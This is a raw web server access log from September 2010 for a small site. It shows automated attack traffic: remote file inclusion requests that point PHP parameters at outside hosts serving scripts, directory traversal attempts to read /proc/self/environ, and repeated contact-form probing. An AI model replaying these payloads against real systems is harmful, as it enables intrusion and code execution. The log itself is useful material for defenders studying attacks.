222.236.47.182 - - [02/Sep/2010:12:26:25 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:26:53 -0700] "POST /logs/access_090320.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:26:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:26:59 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:12:27:07 -0700] "GET /http://wonderfulcs.com/data/ray.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:27:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:27:13 -0700] "POST /logs/access_090320.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:27:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
80.72.93.190 - - [02/Sep/2010:12:27:18 -0700] "GET /logs/access_081117.log//index.php?option=com_exposeprive&itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:23 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:23 -0700] "GET /logs/access_091202.log/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:27 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:37 -0700] "GET /logs/access_091022.log/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:56 -0700] "GET /logs/access_091202.log/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:27:59 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.87.252.58 - - [02/Sep/2010:12:28:13 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/xml/media-rss.php HTTP/1.1" 200 7897 "-" "Apple-PubSub/65.20" "dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:28:13 -0700] "GET /logs/access_091022.log/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:28:19 -0700] "POST /logs/access_080316.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:28:19 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:28:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.162.80.226 - - [02/Sep/2010:12:29:03 -0700] "POST /logs/access_091118.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.162.80.226 - - [02/Sep/2010:12:29:03 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
69.162.80.226 - - [02/Sep/2010:12:29:04 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:29:24 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:29:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:29:27 -0700] "POST /logs/access_100201.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:30:11 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:30:14 -0700] "POST /logs/access_080914.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:30:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:30:22 -0700] "GET /logs/access_100704.log HTTP/1.0" 200 7497454 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:48 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:48 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:49 -0700] "POST /logs/access_100317.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:30:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:30:54 -0700] "GET /logs/access_100302.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:30:56 -0700] "GET /logs/access_091031.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.92.13.125 - - [02/Sep/2010:12:30:59 -0700] "GET /database.php?mosConfig_absolute_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/media/a/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:31:38 -0700] "GET /logs/access_100302.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:31:40 -0700] "GET /logs/access_091031.log%20%20/skins/advanced/advanced1.php?pluginpath[0]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:31:46 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:31:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:31:49 -0700] "POST /logs/access_100410.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:32:01 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:32:02 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:08 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:09 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:10 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:32:11 -0700] "POST /logs/access_081019.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:12 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:14 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:14 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:15 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:15 -0700] "POST /logs/access_100317.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
202.117.35.252 - - [02/Sep/2010:12:32:20 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:32:46 -0700] "GET /logs/access_080907.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:32:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
173.236.55.210 - - [02/Sep/2010:12:32:49 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:33:06 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:33:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:33:09 -0700] "POST /logs/access_081019.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:33:14 -0700] "GET /logs/access_081218.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:33:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:33:17 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:33:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:12:33:32 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:33:47 -0700] "POST /logs/access_100410.log//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:34:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:34:30 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:34:36 -0700] "POST /logs/access_100714.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
76.13.230.13 - - [02/Sep/2010:12:35:59 -0700] "GET /retreat1_08887.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:12:36:01 -0700] "GET /retreat1_08893.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:12:36:02 -0700] "GET /retreat1_08895.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:12:36:02 -0700] "GET /retreat1_08900.jpg HTTP/1.0" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.13 - - [02/Sep/2010:12:36:03 -0700] "GET /retreat1_08903.jpg HTTP/1.0" 404 - "-" "YahooCacheSystem" "dmulk.com"
76.13.230.12 - - [02/Sep/2010:12:36:04 -0700] "GET /retreat1_08921.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
222.236.47.182 - - [02/Sep/2010:12:36:05 -0700] "GET /logs/access_090210.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.13.230.12 - - [02/Sep/2010:12:36:05 -0700] "GET /retreat1_08923.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
82.141.136.11 - - [02/Sep/2010:12:37:20 -0700] "POST /logs/access_091118.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:12:37:23 -0700] "POST /logs/access_090124.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:37:51 -0700] "GET /logs/access_091126.log HTTP/1.0" 200 2337164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:12:38:16 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:12:38:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:12:38:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:12:39:05 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
93.114.41.85 - - [02/Sep/2010:12:39:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:39:43 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:39:45 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:39:46 -0700] "POST /logs/access_100317.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
67.210.122.47 - - [02/Sep/2010:12:39:57 -0700] "GET /logs/access.log//////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "dmulk.com"
67.210.122.47 - - [02/Sep/2010:12:40:03 -0700] "GET /////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "libwww-perl/5.805" "dmulk.com"
67.210.122.47 - - [02/Sep/2010:12:40:04 -0700] "GET /logs//////?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167704 "-" "libwww-perl/5.805" "dmulk.com"
67.195.114.243 - - [02/Sep/2010:12:40:11 -0700] "GET /bikes/dteel/2009_02_12/ HTTP/1.0" 200 694 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /logs/access_100115.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
89.31.97.233 - - [02/Sep/2010:12:40:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.arena-atletiek.nl/components/com_ccnewsletter/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:12:40:57 -0700] "GET /logs/access_090815.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:12:40:57 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:12:41:05 -0700] "GET /logs/access_090913.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
109.61.10.121 - - [02/Sep/2010:12:41:07 -0700] "POST /logs/access_081025.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:42:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:42:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:42:10 -0700] "POST /logs/access_091225.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
85.236.50.166 - - [02/Sep/2010:12:42:10 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:42:12 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:42:12 -0700] "GET /logs/access_100127.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
97.74.198.126 - - [02/Sep/2010:12:42:12 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.colegiolucilagodoy.cl/lg/munyuk/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.166.221 - - [02/Sep/2010:12:42:26 -0700] "GET /logs/access_100206.log/http://wonderfulcs.com/data/ray.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
